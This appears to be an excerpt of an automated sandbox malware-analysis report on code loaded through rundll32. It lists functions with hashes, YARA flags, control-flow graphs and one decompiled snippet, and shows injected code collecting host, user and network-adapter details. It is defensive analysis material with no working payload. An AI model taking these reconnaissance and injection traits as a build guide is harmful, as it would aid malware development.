                                                                                                                                              • Instruction ID: d802f9279f16f58062dd18933f441293c6a9f8e27e47ed84aec314175467b41b
                                                                                                                                              • Opcode Fuzzy Hash: 570ea093171ef70ab32a71528cc7d048381a2e7ff00b26fdcbfa97036560c0e5
                                                                                                                                              • Instruction Fuzzy Hash: 7431733131CE4D8BEB58FF65E8956E977A2FB94300F404129A80ED3197DE70EA49C790
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00000175235203E8 Relevance: 8.3, APIs: 5, Instructions: 774memorylibraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000003.428621647.0000017523520000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017523520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_3_17523520000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Virtual$Alloc$InfoLibraryLoadNativeProtectSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1717272791-0
                                                                                                                                              • Opcode ID: ffcca4325f1879ef2b685faa99aa144257f16943dc483e9c9d0da181b199765f
                                                                                                                                              • Instruction ID: 762d59ce0a51eee64070e336b550dbcfa6a97ee1b4cfe4f3f38db052cb618bec
                                                                                                                                              • Opcode Fuzzy Hash: ffcca4325f1879ef2b685faa99aa144257f16943dc483e9c9d0da181b199765f
                                                                                                                                              • Instruction Fuzzy Hash: 4332B33171AE19CBEB689A58C8853B5B7F2FF54301F15416DD88FC3687EAB4E84286C1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000017523520280 Relevance: 1.7, APIs: 1, Instructions: 173memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000003.428621647.0000017523520000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017523520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_3_17523520000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                              • Opcode ID: de0a3b7f8e47ed2dc0bc0acfe32a9bada84b4450c65feb898d3d454f458db3e6
                                                                                                                                              • Instruction ID: 7af7bf031bbfac47a2c23fceb26dcc200cf0a52c9f61ba7d989141c691713040
                                                                                                                                              • Opcode Fuzzy Hash: de0a3b7f8e47ed2dc0bc0acfe32a9bada84b4450c65feb898d3d454f458db3e6
                                                                                                                                              • Instruction Fuzzy Hash: E741AE31328E0D8FE75CEA2CC896BB077E1FB69354F1412ADD48EC7297D928E8468745
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 000001752353277C Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.836538938.0000017523531000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017523531000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_17523531000_rundll32.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccountLookupName
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1484870144-0
                                                                                                                                              • Opcode ID: e2aef2d842bc08a14cee6cbb0b7910c6938a661f39e30b9e457bb891ae6998f7
                                                                                                                                              • Instruction ID: f393699c49108df09b73b07c5d66cd5a926eefde6a242bfb19622903617cdaec
                                                                                                                                              • Opcode Fuzzy Hash: e2aef2d842bc08a14cee6cbb0b7910c6938a661f39e30b9e457bb891ae6998f7
                                                                                                                                              • Instruction Fuzzy Hash: 14418231718E4D8FEB55AF78D8486EABBF6FB58301F14462AA80ED2152EF74D5048781
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00000175235324AC Relevance: 1.6, APIs: 1, Instructions: 111memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • RtlAllocateHeap.NTDLL ref: 00000175235324DB
                                                                                                                                                • Part of subcall function 000001752353227C: NtQuerySystemInformation.NTDLL ref: 00000175235322CF
                                                                                                                                                • Part of subcall function 000001752353112C: GetComputerNameExW.KERNELBASE ref: 000001752353116C
                                                                                                                                                • Part of subcall function 000001752353112C: GetUserNameW.ADVAPI32 ref: 00000175235311AB
                                                                                                                                                • Part of subcall function 0000017523532610: LoadLibraryA.KERNELBASE ref: 000001752353263E
                                                                                                                                                • Part of subcall function 0000017523532610: GetAdaptersInfo.IPHLPAPI ref: 0000017523532663
                                                                                                                                                • Part of subcall function 0000017523532610: GetAdaptersInfo.IPHLPAPI ref: 0000017523532699
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.836538938.0000017523531000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017523531000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_17523531000_rundll32.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AdaptersInfoName$AllocateComputerHeapInformationLibraryLoadQuerySystemUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2113475406-0
                                                                                                                                              • Opcode ID: 4bc5299ead9dc4f5f2c69a85c95e206c11032a4fd298527f465590f71116c25e
                                                                                                                                              • Instruction ID: 4932a70778cc2455ddec34c9649cb98319cfcbcb334325234324b3a671f0dd11
                                                                                                                                              • Opcode Fuzzy Hash: 4bc5299ead9dc4f5f2c69a85c95e206c11032a4fd298527f465590f71116c25e
                                                                                                                                              • Instruction Fuzzy Hash: 81315430358E0D4BE709BFA9E8886E977E1F758311F54012EA40AC3276EFB8A955C7C1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000017523532B3C Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 141 17523532b3c-17523532b69 142 17523532b71-17523532b8c call 175235325bc 141->142 145 17523532bea-17523532bed 142->145 146 17523532b8e-17523532b93 142->146 147 17523532bef-17523532bfb 145->147 148 17523532c03 145->148 149 17523532b95-17523532b98 146->149 150 17523532bbd-17523532bc0 146->150 147->148 154 17523532c05-17523532c1d 148->154 151 17523532bd6-17523532be1 SleepEx 149->151 153 17523532b9a-17523532ba1 149->153 150->151 152 17523532bc2-17523532bce 150->152 151->142 152->151 153->150 156 17523532ba3-17523532ba6 153->156 156->150 158 17523532ba8-17523532bac 156->158 158->150 159 17523532bae-17523532bbb call 175235320d8 158->159 159->150 162 17523532be3-17523532be8 159->162 162->154
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.836538938.0000017523531000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017523531000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_17523531000_rundll32.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                              • Opcode ID: 33cbbefbed22416c0a1cff3d24c8c92bb0ce72c590ea2767d66272bac37ffbd4
                                                                                                                                              • Instruction ID: 3d3c43c0cbc9c0f6e8b5f3c83d8e49bfe66b40caf0448b8e59cca6c21da5a008
                                                                                                                                              • Opcode Fuzzy Hash: 33cbbefbed22416c0a1cff3d24c8c92bb0ce72c590ea2767d66272bac37ffbd4
                                                                                                                                              • Instruction Fuzzy Hash: 3D21623072CE498BEB68AF58F8987957BE2F7A8311F004569A40DC3197CA78D8448782
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00000175235323AC Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 163 175235323ac-175235323e4 167 175235323e6-175235323eb GetNativeSystemInfo 163->167 168 175235323ed-175235323fd 163->168 167->168
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.836538938.0000017523531000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017523531000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_17523531000_rundll32.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InfoNativeSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1721193555-0
                                                                                                                                              • Opcode ID: b9f9b7c4d44abfb99a79a3f74329715b6e2af83f968cb0ba3c3446968f47d8c2
                                                                                                                                              • Instruction ID: 4244dc146f0733f7453963901a57f532444ad1fa0455122810195dc4bf04cfa4
                                                                                                                                              • Opcode Fuzzy Hash: b9f9b7c4d44abfb99a79a3f74329715b6e2af83f968cb0ba3c3446968f47d8c2
                                                                                                                                              • Instruction Fuzzy Hash: 95F065326159098BF705FB61DDD89FA77B5FB94305F00072BA44AC20B1EF78D648C681
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000017523531378 Relevance: 1.5, APIs: 1, Instructions: 18threadCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 169 17523531378-1752353137f 170 175235313a0-175235313a9 169->170 171 17523531381-1752353139a CreateThread 169->171 171->170
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.836538938.0000017523531000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017523531000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_17523531000_rundll32.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2422867632-0
                                                                                                                                              • Opcode ID: 3350c80752480aedc9bfe799b04cdd6c25c9c56bf407ce6c077106c937c08697
                                                                                                                                              • Instruction ID: c130f1fe886b9bc6fd2b7a57959f6567d2b602d5bffc92057e51f01a612234e3
                                                                                                                                              • Opcode Fuzzy Hash: 3350c80752480aedc9bfe799b04cdd6c25c9c56bf407ce6c077106c937c08697
                                                                                                                                              • Instruction Fuzzy Hash: 09D05E31624A0587EB18EB309C5A399B7A2F7C032EF908219E88AC40A4C77D82858506
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000017523532758 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 172 17523532758-1752353275c 173 17523532769-17523532770 172->173 174 1752353275e-17523532763 SleepEx 173->174 175 17523532772-1752353277b 173->175 174->173
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.836538938.0000017523531000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017523531000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_17523531000_rundll32.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                              • Opcode ID: 42bb7f67826316e5486fbbec75956cc1b371c3f1f20fb89932a19459f66ea48f
                                                                                                                                              • Instruction ID: 69ca03f84714bccfe744150b9ad3056f2dd0b56a92c19532ac120adc575e0f79
                                                                                                                                              • Opcode Fuzzy Hash: 42bb7f67826316e5486fbbec75956cc1b371c3f1f20fb89932a19459f66ea48f
                                                                                                                                              • Instruction Fuzzy Hash: 9DC01234226A84D7F36CA775E86D3B83AB2A304301F100619D10E844E2CF7A14848682
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Non-executed Functions

                                                                                                                                              Function 0000000180040220 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 270COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ConditionMask$InfoVerifyVersion$HandleModule
                                                                                                                                              • String ID: kernel32.dll$ntdll.dll
                                                                                                                                              • API String ID: 2481217963-3159745453
                                                                                                                                              • Opcode ID: 23fb41f1f84611b3deeabb95558c7d0207658b63e3f009138ffebcd9c723470e
                                                                                                                                              • Instruction ID: 8550f13038493becdcdadba6452096faeedd7d95232f0929e008b96b718b5d72
                                                                                                                                              • Opcode Fuzzy Hash: 23fb41f1f84611b3deeabb95558c7d0207658b63e3f009138ffebcd9c723470e
                                                                                                                                              • Instruction Fuzzy Hash: 2EA1B532315A094AFBC6DF21EC983D677A1E78C798F548425EA4E8B794DE7CC24E8704
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 000000018001F8C0 Relevance: 32.0, APIs: 9, Strings: 9, Instructions: 470threadCOMMONCrypto
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 510 18001f8c0-18001f8e3 511 18001f8e9-18001f8f1 510->511 512 18001f98d-18001f9a9 call 18011d480 510->512 514 18001f8f3 call 180052ce0 511->514 515 18001f9ae-18001f9e0 call 1800a0700 512->515 516 18001f8f8-18001f941 call 180052730 * 2 514->516 521 18001fad1-18001fadf call 1800e94c4 515->521 522 18001f9e6-18001f9ed 515->522 529 18001f943-18001f950 516->529 530 18001f95c-18001f964 516->530 521->522 540 18001fae5-18001faf9 call 18011d3a0 521->540 524 18001fa0e-18001fa16 522->524 525 18001f9ef-18001fa09 call 1801623c0 GetCurrentThreadId call 180015ea0 522->525 531 18001fa1c-18001fa40 GetCurrentThreadId call 180047230 524->531 532 18001fab0-18001facc call 18011d480 524->532 525->524 536 18001f952-18001f95a 529->536 537 18001f966-18001f96b call 180052750 529->537 538 18001f973-18001f981 530->538 547 18001fa42-18001fa74 call 18001f8c0 call 18000dd30 531->547 548 18001fa7f-18001faa3 call 180047280 531->548 532->521 536->538 537->538 538->515 545 18001f983-18001f98c 538->545 552 18001fb28-18001fb3a call 1800e959b 540->552 553 18001fafb-18001fb0f call 18011d3a0 540->553 547->548 558 18001faa9-18001faaf 548->558 559 18001fb3f-18001fb5d call 1800a0700 548->559 552->522 553->552 565 18001fb11-18001fb25 call 18011d3a0 553->565 569 18001fbbe-18001fc00 call 18011d480 559->569 570 18001fb5f-18001fb83 GetCurrentThreadId call 180047230 559->570 565->552 575 18001fc06-18001fc0d 569->575 576 18001fcea-18001fcf8 call 1800e94c4 569->576 577 18001fb85-18001fb8f 570->577 578 18001fb9e 570->578 579 18001fc2e-18001fc36 575->579 580 18001fc0f-18001fc29 call 1801623c0 GetCurrentThreadId call 180015ea0 575->580 576->575 591 18001fcfe-18001fd12 call 18011d3a0 576->591 582 18001fb91-18001fb9c 577->582 583 18001fba0-18001fbbd call 180047280 577->583 578->583 586 18001fcc9-18001fce5 call 18011d480 579->586 587 18001fc3c-18001fc60 GetCurrentThreadId call 180047230 579->587 580->579 582->583 586->576 598 18001fc62-18001fc93 call 18001f8c0 call 18000dd30 587->598 599 18001fc98-18001fcbc call 180047280 587->599 601 18001fd41-18001fd53 call 1800e959b 591->601 602 18001fd14-18001fd28 call 18011d3a0 591->602 598->599 608 18001fcc2-18001fcc8 599->608 609 18001fd58-18001fd80 call 1800a0700 599->609 601->575 602->601 614 18001fd2a-18001fd3e call 18011d3a0 602->614 618 18001fe71-18001fe7f call 1800e94c4 609->618 619 18001fd86-18001fd8d 609->619 614->601 618->619 630 18001fe85-18001fe99 call 18011d3a0 618->630 620 18001fdae-18001fdb6 619->620 621 18001fd8f-18001fda9 call 1801623c0 GetCurrentThreadId call 180015ea0 619->621 624 18001fdbc-18001fde0 GetCurrentThreadId call 180047230 620->624 625 18001fe50-18001fe6c call 18011d480 620->625 621->620 634 18001fde2-18001fe14 call 18001f8c0 call 18000dd30 624->634 635 18001fe1f-18001fe43 call 180047280 624->635 625->618 638 18001fec8-18001feda call 1800e959b 630->638 639 18001fe9b-18001feaf call 18011d3a0 630->639 634->635 647 18001fe49-18001fe4f 635->647 648 18001fedf-18001fefc call 1800a0700 635->648 638->619 639->638 651 18001feb1-18001fec5 call 18011d3a0 639->651 656 18001ff15-18001ff51 call 18011d480 648->656 657 18001fefe-18001ff14 648->657 651->638 660 18001ff57-18001ff5e 656->660 661 18002000d-18002001b call 1800e94c4 656->661 662 18001ff82-18001ffab GetCurrentThreadId call 180047230 660->662 663 18001ff60-18001ff7d call 1801623c0 GetCurrentThreadId call 180015ea0 660->663 661->660 669 180020021-180020035 call 18011d3a0 661->669 673 18001ffc3-18001ffe6 662->673 674 18001ffad-18001ffbd call 180038410 662->674 663->662 678 180020064-180020076 call 1800e959b 669->678 679 180020037-18002004b call 18011d3a0 669->679 677 18001ffec-180020008 call 18011d480 673->677 674->677 683 18001ffbf 674->683 677->661 678->660 679->678 687 18002004d-180020061 call 18011d3a0 679->687 683->673 687->678
                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                              			E0000000118001F8C0() {
				signed int _v40;
				char _v64;
				void* _t7;
				void* _t8;
				signed long long _t18;
				signed long long _t22;
				void* _t28;
				signed long long _t37;
				signed int* _t38;

				_t38 =  *0x8011f718; // 0x18017b428
				_t18 =  *_t38 ^ _t37;
				_v40 = _t18;
				if ( *0x8017cc40 == 0) goto 0x8001f98d;
				_t36 =  &_v64;
				E00000001180052CE0(1,  &_v64);
				_t34 =  *0x8017cc40;
				E00000001180052730(_t36,  *0x8017cc40);
				_t22 = _t18;
				_t7 = E00000001180052730(_t36, _t34);
				_t33 =  <  ? _t22 : 0xffffffff;
				_t27 =  <=  ? _t22 : 0x8000000000000000;
				_t28 =  >  ?  <  ? _t22 : 0xffffffff :  <=  ? _t22 : 0x8000000000000000;
				if (_t28 == 0xffffffff) goto 0x8001f95c;
				if (_t28 != 0) goto 0x8001f966;
				asm("movsd xmm0, [0x1000ce]");
				goto 0x8001f973;
				asm("movsd xmm0, [0x1000bc]");
				goto 0x8001f973;
				_t8 = E00000001180052750(_t7);
				asm("mulsd xmm0, [0x1000bd]");
				if ( *_t38 != (_v40 ^ _t37)) goto 0x8001f9ae;
				return _t8;
			}












                                                                                                                                              0x18001f8c9
                                                                                                                                              0x18001f8d3
                                                                                                                                              0x18001f8d6
                                                                                                                                              0x18001f8e3
                                                                                                                                              0x18001f8e9
                                                                                                                                              0x18001f8f3
                                                                                                                                              0x18001f8f8
                                                                                                                                              0x18001f905
                                                                                                                                              0x18001f90a
                                                                                                                                              0x18001f913
                                                                                                                                              0x18001f928
                                                                                                                                              0x18001f933
                                                                                                                                              0x18001f93a
                                                                                                                                              0x18001f941
                                                                                                                                              0x18001f950
                                                                                                                                              0x18001f952
                                                                                                                                              0x18001f95a
                                                                                                                                              0x18001f95c
                                                                                                                                              0x18001f964
                                                                                                                                              0x18001f966
                                                                                                                                              0x18001f96b
                                                                                                                                              0x18001f981
                                                                                                                                              0x18001f98c

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentThread$CriticalSection$Count64CounterEnterLeavePerformanceQueryTick
                                                                                                                                              • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_RELEASE_ASSERT(CorePS::Exists())$MOZ_RELEASE_ASSERT(sInstance->mCounters.append(aCounter))$[D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                              • API String ID: 3491232292-2127519747
                                                                                                                                              • Opcode ID: cd2e97fc9310a0c38bfe618dec097dc8d5105a22bfd32a1cf506723151cc7774
                                                                                                                                              • Instruction ID: 5e8be1ba19b0501baff45afe88729ca0fedf41b081d55f7f2d5f18f1d60db8b3
                                                                                                                                              • Opcode Fuzzy Hash: cd2e97fc9310a0c38bfe618dec097dc8d5105a22bfd32a1cf506723151cc7774
                                                                                                                                              • Instruction Fuzzy Hash: 40126E71611A4C82FBE7EB24E9593E923A1A74CBA4F50C12AE90D437A6DF38C74DC741
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180051830 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 347windowCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 690 180051830-180051865 691 180051867 690->691 692 18005186d-18005187d 690->692 691->692 694 180051886-18005189d 692->694 695 18005187f-180051882 692->695 703 1800518f1 694->703 704 18005189f-1800518b5 694->704 696 1800518b7-1800518b9 695->696 697 180051884 695->697 698 1800518f3-180051901 696->698 700 1800518bb-1800518db 696->700 697->698 701 180051911-180051947 call 1800a0700 698->701 702 180051903-180051910 698->702 700->698 707 1800518dd-1800518ef 700->707 710 180051a18-180051a26 701->710 711 18005194d-18005195f 701->711 703->698 704->696 704->698 707->698 712 180051a35-180051a9f call 1800a0700 710->712 713 180051a28-180051a34 710->713 711->710 714 180051965-180051988 GetCurrentProcess 711->714 720 180051af1-180051b21 GetCurrentProcess EnterCriticalSection call 180051830 712->720 721 180051aa1-180051aa8 712->721 714->710 719 18005198e-180051a16 GetLastError FormatMessageA call 1800ea900 call 18011d510 LocalFree 714->719 719->710 728 180051b23-180051b5a call 18011d620 720->728 729 180051b7f-180051baa 720->729 723 180051abe-180051ae5 GetCurrentProcess 721->723 724 180051aaa-180051ab7 InitializeCriticalSection 721->724 737 180051c0f-180051c9f GetLastError FormatMessageA call 1800ea900 call 18011d510 LocalFree 723->737 738 180051aeb 723->738 724->723 728->729 740 180051b5c-180051b79 call 18011d620 728->740 741 180051bd9-180051be6 LeaveCriticalSection 729->741 742 180051bac-180051bd2 call 18011d620 729->742 743 180051be9-180051bfa 737->743 738->720 740->729 741->743 742->741 748 180051ca4-180051ce0 call 1800a0700 743->748 749 180051c00-180051c0e 743->749 756 180051d42-180051d4f 748->756 757 180051ce2-180051ce5 748->757 757->756 758 180051ce7-180051cea 757->758 758->756 760 180051cec-180051cf6 758->760 762 180051d00-180051d03 760->762 762->756 764 180051d05-180051d0b 762->764 764->756 765 180051d0d-180051d10 764->765 765->756 766 180051d12-180051d1c 765->766 766->756 767 180051d1e-180051d39 766->767 767->762 769 180051d3b-180051d40 767->769 769->756 769->762
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalCurrentProcessSection$ErrorFormatFreeLastLocalMessage$EnterInitializeLeave
                                                                                                                                              • String ID: ### ERROR: %s: %s$(null)$0x%llx$SymInitialize$SymLoadModule64$X
                                                                                                                                              • API String ID: 2780773978-2739449733
                                                                                                                                              • Opcode ID: dc4e9d2495ddf28722a9034fe4513c86ef8573d61ee207ecd49627abc6264e96
                                                                                                                                              • Instruction ID: 23a375fe40a3a0c4013d1cb61f7d9d778d5bae7a6209f130d4d4209512e9acc2
                                                                                                                                              • Opcode Fuzzy Hash: dc4e9d2495ddf28722a9034fe4513c86ef8573d61ee207ecd49627abc6264e96
                                                                                                                                              • Instruction Fuzzy Hash: 5ED1CE31314A8886FBA6CB65E8587EA77A0F78CBD1F448025EE8913794EF7DC64D8700
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000000180002190 Relevance: 28.8, APIs: 17, Strings: 2, Instructions: 292memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.834599839.0000000180001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                              • Associated: 0000000A.00000002.834527261.0000000180000000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835386689.000000018011F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835496604.000000018017B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835515221.0000000180180000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              • Associated: 0000000A.00000002.835538528.0000000180189000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_180000000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Leave$EnterVirtual$Alloc$Free
                                                                                                                                              • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                              • API String ID: 3491674043-2186867486
                                                                                                                                              • Opcode ID: 3a1384445e0809046bc566f9d4800eee03e87628e3363d85f0314493c2ca3ec7
                                                                                                                                              • Instruction ID: cbcf069c9200ee4288dcbba6e6cb5c7d75dec9150410f95d8a9c92d1ac805f72
                                                                                                                                              • Opcode Fuzzy Hash: 3a1384445e0809046bc566f9d4800eee03e87628e3363d85f0314493c2ca3ec7
                                                                                                                                              • Instruction Fuzzy Hash: 88C16B31711A5895FAD7DB21A9183EA3291B75CBE4F448215ED6D077E8EF38C74D8300
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00000001800080F0 Relevance: 28.3, APIs: 11, Strings: 5, Instructions: 337COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
